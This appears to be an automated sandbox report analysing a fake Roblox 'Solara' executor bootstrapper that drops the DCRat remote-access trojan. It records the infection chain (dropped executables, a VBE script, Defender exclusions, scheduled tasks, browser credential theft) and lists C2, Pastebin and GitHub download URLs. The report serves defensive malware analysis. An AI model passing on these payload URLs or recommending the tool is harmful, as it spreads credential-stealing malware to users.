                                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1511213 Sample: BootstrapperV1.19.exe Startdate: 14/09/2024 Architecture: WINDOWS Score: 100 102 pastebin.com 2->102 104 clientsettings.roblox.com 2->104 106 6 other IPs or domains 2->106 118 Multi AV Scanner detection for domain / URL 2->118 120 Suricata IDS alerts for network traffic 2->120 122 Found malware configuration 2->122 126 21 other signatures 2->126 12 BootstrapperV1.19.exe 3 2->12         started        15 xMWILCHEwdBVCAxxjofRRL.exe 2->15         started        18 PerfNET.exe 2->18         started        20 2 other processes 2->20 signatures3 124 Connects to a pastebin service (likely for C&C) 102->124 process4 file5 98 C:\Users\user\AppData\...\Solaraexecutor.exe, PE32 12->98 dropped 100 C:\Users\user\...\BootstrapperV1.19.exe, PE32+ 12->100 dropped 22 Solaraexecutor.exe 3 11 12->22         started        26 BootstrapperV1.19.exe 14 8 12->26         started        148 Multi AV Scanner detection for dropped file 15->148 150 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 15->150 signatures6 process7 dnsIp8 76 C:\Users\user\AppData\Local\...\PerfNET.exe, PE32 22->76 dropped 78 5gB39wu8IXigNc9ZhK...nqJLoLFIRPlM05a.vbe, data 22->78 dropped 128 Antivirus detection for dropped file 22->128 130 Multi AV Scanner detection for dropped file 22->130 132 Machine Learning detection for dropped file 22->132 29 wscript.exe 1 22->29         started        110 pastebin.com 104.20.3.235, 443, 49733 CLOUDFLARENETUS United States 26->110 112 edge-term4-fra2.roblox.com 128.116.123.4, 443, 49734 ROBLOX-PRODUCTIONUS United States 26->112 114 3 other IPs or domains 26->114 80 \Device\ConDrv, ISO-8859 26->80 dropped 32 WerFault.exe 19 16 26->32         started        34 conhost.exe 26->34         started        file9 signatures10 process11 signatures12 144 Windows Scripting host queries suspicious COM object (likely to drop second stage) 29->144 146 Suspicious execution chain found 29->146 36 cmd.exe 1 29->36         started        38 conhost.exe 29->38         started        process13 process14 40 PerfNET.exe 3 21 36->40         started        44 conhost.exe 36->44         started        file15 82 C:\WindowsLAMBKUP\SIHClient.exe, PE32 40->82 dropped 84 C:\Users\user\Desktop\qHDXlZnr.log, PE32 40->84 dropped 86 C:\Users\user\Desktop\nFQoPqiw.log, PE32 40->86 dropped 88 7 other malicious files 40->88 dropped 134 Multi AV Scanner detection for dropped file 40->134 136 Uses schtasks.exe or at.exe to add and modify task schedules 40->136 138 Adds a directory exclusion to Windows Defender 40->138 140 Creates processes via WMI 40->140 46 cmd.exe 40->46         started        48 powershell.exe 40->48         started        51 powershell.exe 40->51         started        53 19 other processes 40->53 signatures16 process17 signatures18 55 xMWILCHEwdBVCAxxjofRRL.exe 46->55         started        72 3 other processes 46->72 116 Loading BitLocker PowerShell Module 48->116 60 conhost.exe 48->60         started        62 WmiPrvSE.exe 48->62         started        64 conhost.exe 51->64         started        66 conhost.exe 53->66         started        68 conhost.exe 53->68         started        70 conhost.exe 53->70         started        74 12 other processes 53->74 process19 dnsIp20 108 598828cm.n9shka.top 80.211.144.156, 62761, 62762, 62763 ARUBA-ASNIT Italy 55->108 90 C:\Users\user\Desktop\wLNGnQCR.log, PE32 55->90 dropped 92 C:\Users\user\Desktop\gjQRaIsv.log, PE32 55->92 dropped 94 C:\Users\user\Desktop\VMFLzOzY.log, PE32 55->94 dropped 96 C:\Users\user\Desktop\FtgWXsHz.log, PE32 55->96 dropped 142 Tries to harvest and steal browser information (history, passwords, etc) 55->142 file21 signatures22

                                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                    windows-stand
                                    SourceDetectionScannerLabelLink
                                    BootstrapperV1.19.exe87%VirustotalBrowse
                                    BootstrapperV1.19.exe95%ReversingLabsWin32.Trojan.DCRat
                                    BootstrapperV1.19.exe100%AviraVBS/Runner.VPG
                                    BootstrapperV1.19.exe100%Joe Sandbox ML
                                    SourceDetectionScannerLabelLink
                                    C:\Program Files (x86)\Common Files\xMWILCHEwdBVCAxxjofRRL.exe100%AviraHEUR/AGEN.1323342
                                    C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe100%AviraTR/Redcap.oczed
                                    C:\Users\Default\AppData\RuntimeBroker.exe100%AviraHEUR/AGEN.1323342
                                    C:\Program Files (x86)\Common Files\xMWILCHEwdBVCAxxjofRRL.exe100%AviraHEUR/AGEN.1323342
                                    C:\Users\user\AppData\Local\Temp\OQZC6ToBZn.bat100%AviraBAT/Delbat.C
                                    C:\Program Files (x86)\Common Files\xMWILCHEwdBVCAxxjofRRL.exe100%AviraHEUR/AGEN.1323342
                                    C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe100%AviraVBS/Runner.VPG
                                    C:\Program Files (x86)\Common Files\xMWILCHEwdBVCAxxjofRRL.exe100%Joe Sandbox ML
                                    C:\Users\Default\AppData\RuntimeBroker.exe100%Joe Sandbox ML
                                    C:\Program Files (x86)\Common Files\xMWILCHEwdBVCAxxjofRRL.exe100%Joe Sandbox ML
                                    C:\Program Files (x86)\Common Files\xMWILCHEwdBVCAxxjofRRL.exe100%Joe Sandbox ML
                                    C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe100%Joe Sandbox ML
                                    C:\Program Files (x86)\Common Files\xMWILCHEwdBVCAxxjofRRL.exe58%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMWILCHEwdBVCAxxjofRRL.exe58%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe58%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\Default\AppData\RuntimeBroker.exe58%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe45%ReversingLabsWin32.Trojan.Generic
                                    C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe55%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe58%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\FtgWXsHz.log17%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\GnKnxRmO.log8%ReversingLabs
                                    C:\Users\user\Desktop\QWdDhtsw.log17%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    No Antivirus matches
                                    SourceDetectionScannerLabelLink
                                    getsolara.dev14%VirustotalBrowse
                                    edge-term4-fra2.roblox.com0%VirustotalBrowse
                                    www.nodejs.org0%VirustotalBrowse
                                    pastebin.com0%VirustotalBrowse
                                    clientsettings.roblox.com0%VirustotalBrowse
                                    SourceDetectionScannerLabelLink
                                    https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                                    https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                                    http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                                    http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                                    https://www.ecosia.org/newtab/0%URL Reputationsafe
                                    https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                                    https://aka.ms/pscore680%URL Reputationsafe
                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                                    http://127.0.0.1:64630%Avira URL Cloudsafe
                                    https://www.cloudflare.com/learning/access-management/phishing-attack/0%Avira URL Cloudsafe
                                    https://www.nodejs.org0%Avira URL Cloudsafe
                                    http://www.nodejs.org0%Avira URL Cloudsafe
                                    https://ncs.roblox.com/upload0%Avira URL Cloudsafe
                                    https://github.com/typeshi12/end/releases/download/re/Bootstrapper.exe0%Avira URL Cloudsafe
                                    http://www.nodejs.org0%VirustotalBrowse
                                    https://gist.githubusercontent.com/typeshi12/072784a0d3a602ed441a435d04c943b6/raw0%Avira URL Cloudsafe
                                    https://www.cloudflare.com/learning/access-management/phishing-attack/0%VirustotalBrowse
                                    http://127.0.0.1:64631%VirustotalBrowse
                                    https://aka.ms/vs/17/release/vc_redist.x64.exe0%Avira URL Cloudsafe
                                    https://getsolara.dev/100%Avira URL Cloudphishing
                                    https://www.nodejs.org0%VirustotalBrowse
                                    https://www.nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi0%Avira URL Cloudsafe
                                    https://github.com/typeshi12/end/releases/download/re/Bootstrapper.exe0%VirustotalBrowse
                                    https://gist.githubusercontent.com/typeshi12/29ef3a44a19235b08aaf229631c024d8/raw0%Avira URL Cloudsafe
                                    http://127.0.0.1:6463/rpc?v=10%Avira URL Cloudsafe
                                    http://edge-term4-fra2.roblox.com0%Avira URL Cloudsafe
                                    https://www.nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi0%VirustotalBrowse
                                    https://getsolara.dev/12%VirustotalBrowse
                                    https://discord.com0%Avira URL Cloudsafe
                                    http://edge-term4-fra2.roblox.com0%VirustotalBrowse
                                    https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
                                    http://www.apache.org/licenses/LICENSE-2.0.html0%Avira URL Cloudsafe
                                    https://aka.ms/vs/17/release/vc_redist.x64.exe0%VirustotalBrowse
                                    https://gist.githubusercontent.com/typeshi12/072784a0d3a602ed441a435d04c943b6/raw0%VirustotalBrowse
                                    https://discord.com0%VirustotalBrowse
                                    https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%VirustotalBrowse
                                    https://github.com/typeshi12/end/releases/download/re/Solara.Dir.zip0%Avira URL Cloudsafe
                                    http://127.0.0.1:6463/rpc?v=10%VirustotalBrowse
                                    http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
                                    https://gist.githubusercontent.com/typeshi12/29ef3a44a19235b08aaf229631c024d8/raw0%VirustotalBrowse
                                    https://getsolara.dev/asset/discord.json100%Avira URL Cloudphishing
                                    https://github.com/Pester/Pester0%Avira URL Cloudsafe
                                    http://james.newtonking.com/projects/json0%Avira URL Cloudsafe
                                    http://getsolara.dev100%Avira URL Cloudphishing
                                    https://discord.com;http://127.0.0.1:6463/rpc?v=110%Avira URL Cloudsafe
                                    https://www.cloudflare.com/5xx-error-landing0%Avira URL Cloudsafe
                                    https://github.com/Pester/Pester1%VirustotalBrowse
                                    http://james.newtonking.com/projects/json0%VirustotalBrowse
                                    https://getsolara.dev/asset/discord.json9%VirustotalBrowse
                                    https://ncs.roblox.com/upload0%VirustotalBrowse
                                    https://clientsettings.roblox.com/v2/client-version/WindowsPlayer/channel/live0%Avira URL Cloudsafe
                                    http://crl.m0%Avira URL Cloudsafe
                                    http://127.0.0.1:64632b0%Avira URL Cloudsafe
                                    https://www.cloudflare.com/5xx-error-landing0%VirustotalBrowse
                                    https://getsolara.dev100%Avira URL Cloudphishing
                                    https://github.com/typeshi12/end/releases/download/re/Solara.Dir.zip0%VirustotalBrowse
                                    https://getsolara.dev/api/endpoint.json100%Avira URL Cloudphishing
                                    http://schemas.xmlsoap.org/wsdl/0%Avira URL Cloudsafe
                                    https://clientsettings.roblox.com/v2/client-version/WindowsPlayer/channel/live0%VirustotalBrowse
                                    http://getsolara.dev14%VirustotalBrowse
                                    https://www.newtonsoft.com/jsonschema0%Avira URL Cloudsafe
                                    https://getsolara.dev12%VirustotalBrowse
                                    http://schemas.xmlsoap.org/wsdl/0%VirustotalBrowse
                                    https://github.com/zzzprojects/html-agility-pack/issues/5130%Avira URL Cloudsafe
                                    https://getsolara.dev/Suspected100%Avira URL Cloudphishing
                                    https://getsolara.dev/X100%Avira URL Cloudphishing
                                    https://www.newtonsoft.com/jsonschema0%VirustotalBrowse
                                    https://www.nuget.org/packages/Newtonsoft.Json.Bson0%Avira URL Cloudsafe
                                    https://getsolara.dev/Suspected11%VirustotalBrowse
                                    https://pastebin.com/raw/pjseRvyK0%Avira URL Cloudsafe
                                    https://getsolara.dev/api/endpoint.json9%VirustotalBrowse
                                    http://clientsettings.roblox.com0%Avira URL Cloudsafe
                                    https://getsolara.dev/X11%VirustotalBrowse
                                    http://pastebin.com0%Avira URL Cloudsafe
                                    https://www.nuget.org/packages/Newtonsoft.Json.Bson0%VirustotalBrowse
                                    https://nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi0%Avira URL Cloudsafe
                                    https://pastebin.com0%Avira URL Cloudsafe
                                    https://pastebin.com/raw/pjseRvyK1%VirustotalBrowse
                                    https://clientsettings.roblox.com0%Avira URL Cloudsafe
                                    https://github.com/zzzprojects/html-agility-pack/issues/5130%VirustotalBrowse
                                    http://clientsettings.roblox.com0%VirustotalBrowse
                                    http://598828cm.n9shka.top/VmPollSecureLongpollApiBasewindowsUniversal.php100%Avira URL Cloudmalware
                                    https://nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi0%VirustotalBrowse
                                    http://pastebin.com0%VirustotalBrowse
                                    https://gist.githubusercontent.com/typeshi12/072784a0d3a602ed441a435d04c943b6/rawChttps://pastebin.c0%Avira URL Cloudsafe
                                    https://pastebin.com0%VirustotalBrowse
                                    https://clientsettings.roblox.com0%VirustotalBrowse
                                    NameIPActiveMaliciousAntivirus DetectionReputation
                                    598828cm.n9shka.top
                                    80.211.144.156
                                    truetrue
                                      unknown
                                      getsolara.dev
                                      172.67.203.125
                                      truefalseunknown
                                      edge-term4-fra2.roblox.com
                                      128.116.123.4
                                      truefalseunknown
                                      www.nodejs.org
                                      104.20.23.46
                                      truefalseunknown
                                      pastebin.com
                                      104.20.3.235
                                      truetrueunknown
                                      clientsettings.roblox.com
                                      unknown
                                      unknowntrueunknown
                                      NameMaliciousAntivirus DetectionReputation
                                      https://getsolara.dev/true
                                      • 12%, Virustotal, Browse
                                      • Avira URL Cloud: phishing
                                      unknown
                                      https://www.nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msifalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://getsolara.dev/asset/discord.jsontrue
                                      • 9%, Virustotal, Browse
                                      • Avira URL Cloud: phishing
                                      unknown
                                      https://clientsettings.roblox.com/v2/client-version/WindowsPlayer/channel/livefalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://pastebin.com/raw/pjseRvyKfalse
                                      • 1%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://598828cm.n9shka.top/VmPollSecureLongpollApiBasewindowsUniversal.phptrue
                                      • Avira URL Cloud: malware
                                      unknown
                                      NameSourceMaliciousAntivirus DetectionReputation
                                      http://127.0.0.1:6463BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE765000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • 1%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://www.cloudflare.com/learning/access-management/phishing-attack/BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE6A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.nodejs.orgBootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE7B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://duckduckgo.com/chrome_newtab3v5btpnvgg.81.dr, MMbFAjg8y0.81.dr, tVfIYY6CrX.81.dr, Y8tIOTHmdj.81.dr, UEOrLfyMmC.81.dr, SraSKjbzqw.81.dr, GvOu8x04pN.81.dr, Pphv4prXh0.81.dr, Qle9Ol5hY6.81.dr, PapTOP9FFu.81.dr, JLtokMz9wW.81.dr, 7WLPyqKZSQ.81.drfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://duckduckgo.com/ac/?q=3v5btpnvgg.81.dr, MMbFAjg8y0.81.dr, tVfIYY6CrX.81.dr, Y8tIOTHmdj.81.dr, UEOrLfyMmC.81.dr, SraSKjbzqw.81.dr, GvOu8x04pN.81.dr, Pphv4prXh0.81.dr, Qle9Ol5hY6.81.dr, PapTOP9FFu.81.dr, JLtokMz9wW.81.dr, 7WLPyqKZSQ.81.drfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://ncs.roblox.com/uploadBootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE6FB000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE73B000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE7B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://www.nodejs.orgBootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE7B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=3v5btpnvgg.81.dr, MMbFAjg8y0.81.dr, tVfIYY6CrX.81.dr, Y8tIOTHmdj.81.dr, UEOrLfyMmC.81.dr, SraSKjbzqw.81.dr, GvOu8x04pN.81.dr, Pphv4prXh0.81.dr, Qle9Ol5hY6.81.dr, PapTOP9FFu.81.dr, JLtokMz9wW.81.dr, 7WLPyqKZSQ.81.drfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://gist.githubusercontent.com/typeshi12/072784a0d3a602ed441a435d04c943b6/rawBootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE5B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://github.com/typeshi12/end/releases/download/re/Bootstrapper.exeBootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE7B0000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE78C000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://aka.ms/vs/17/release/vc_redist.x64.exeBootstrapperV1.19.exefalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search3v5btpnvgg.81.dr, MMbFAjg8y0.81.dr, tVfIYY6CrX.81.dr, Y8tIOTHmdj.81.dr, UEOrLfyMmC.81.dr, SraSKjbzqw.81.dr, GvOu8x04pN.81.dr, Pphv4prXh0.81.dr, Qle9Ol5hY6.81.dr, PapTOP9FFu.81.dr, JLtokMz9wW.81.dr, 7WLPyqKZSQ.81.drfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://gist.githubusercontent.com/typeshi12/29ef3a44a19235b08aaf229631c024d8/rawBootstrapperV1.19.exefalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://127.0.0.1:6463/rpc?v=1BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE5B1000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE765000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameBootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE63B000.00000004.00000800.00020000.00000000.sdmp, PerfNET.exe, 0000000D.00000002.2160196678.0000000003D03000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2553387448.000001654C041000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2423315485.0000014F5DA01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2361743787.0000019A8E531000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2357954127.000001A3D6031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2330122352.00000250E1361000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2528474954.000002A891561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2464115704.00000166ABF21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2376850557.000001F8CC451000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2523636008.000002B1AF4DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2384862745.00000254AC0D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2434982679.000001F1217F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.2304824073.0000017000001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.2496078113.000001E2AA6F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.2333285594.0000025F80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.2329581046.0000016980001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.2645794938.000001AE1E741000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2341093568.0000025000001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.2354827504.0000019D01411000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://edge-term4-fra2.roblox.comBootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE7B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://discord.comBootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE5B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://www.google.com/images/branding/product/ico/googleg_lodp.ico3v5btpnvgg.81.dr, MMbFAjg8y0.81.dr, tVfIYY6CrX.81.dr, Y8tIOTHmdj.81.dr, UEOrLfyMmC.81.dr, SraSKjbzqw.81.dr, GvOu8x04pN.81.dr, Pphv4prXh0.81.dr, Qle9Ol5hY6.81.dr, PapTOP9FFu.81.dr, JLtokMz9wW.81.dr, 7WLPyqKZSQ.81.drfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000041.00000002.2354827504.0000019D01638000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000020.00000002.2553387448.000001654C2E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2423315485.0000014F5DC27000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2361743787.0000019A8E756000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2357954127.000001A3D6325000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2330122352.00000250E1586000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2528474954.000002A891786000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2464115704.00000166AC146000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2376850557.000001F8CC678000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2523636008.000002B1AF6D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2384862745.00000254AC2F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2434982679.000001F121A17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.2304824073.0000017000226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.2496078113.000001E2AA916000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.2333285594.0000025F80228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.2329581046.0000016980228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.2645794938.000001AE1EA3D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2341093568.0000025000226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.2354827504.0000019D01638000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000041.00000002.2354827504.0000019D01638000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://github.com/typeshi12/end/releases/download/re/Solara.Dir.zipBootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE7B0000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE78C000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=3v5btpnvgg.81.dr, MMbFAjg8y0.81.dr, tVfIYY6CrX.81.dr, Y8tIOTHmdj.81.dr, UEOrLfyMmC.81.dr, SraSKjbzqw.81.dr, GvOu8x04pN.81.dr, Pphv4prXh0.81.dr, Qle9Ol5hY6.81.dr, PapTOP9FFu.81.dr, JLtokMz9wW.81.dr, 7WLPyqKZSQ.81.drfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://www.ecosia.org/newtab/3v5btpnvgg.81.dr, MMbFAjg8y0.81.dr, tVfIYY6CrX.81.dr, Y8tIOTHmdj.81.dr, UEOrLfyMmC.81.dr, SraSKjbzqw.81.dr, GvOu8x04pN.81.dr, Pphv4prXh0.81.dr, Qle9Ol5hY6.81.dr, PapTOP9FFu.81.dr, JLtokMz9wW.81.dr, 7WLPyqKZSQ.81.drfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://github.com/Pester/Pesterpowershell.exe, 00000041.00000002.2354827504.0000019D01638000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • 1%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://james.newtonking.com/projects/jsonBootstrapperV1.19.exefalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://getsolara.devBootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE658000.00000004.00000800.00020000.00000000.sdmptrue
                                      • 14%, Virustotal, Browse
                                      • Avira URL Cloud: phishing
                                      unknown
                                      https://discord.com;http://127.0.0.1:6463/rpc?v=11BootstrapperV1.19.exefalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://www.cloudflare.com/5xx-error-landingBootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE6A2000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE692000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE679000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://ac.ecosia.org/autocomplete?q=3v5btpnvgg.81.dr, MMbFAjg8y0.81.dr, tVfIYY6CrX.81.dr, Y8tIOTHmdj.81.dr, UEOrLfyMmC.81.dr, SraSKjbzqw.81.dr, GvOu8x04pN.81.dr, Pphv4prXh0.81.dr, Qle9Ol5hY6.81.dr, PapTOP9FFu.81.dr, JLtokMz9wW.81.dr, 7WLPyqKZSQ.81.drfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://crl.mpowershell.exe, 0000002F.00000002.2477459718.000002B1AF100000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://127.0.0.1:64632bBootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE765000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://getsolara.devBootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE63B000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE6A2000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE5B1000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000001.00000002.1953033465.00000158AE64E000.00000004.00000800.00020000.00000000.sdmptrue
                                      • 12%, Virustotal, Browse
                                      • Avira URL Cloud: phishing
                                      unknown
                                      https://getsolara.dev/api/endpoint.jsonBootstrapperV1.19.exetrue
                                      • 9%, Virustotal, Browse
                                      • Avira URL Cloud: phishing
                                      unknown
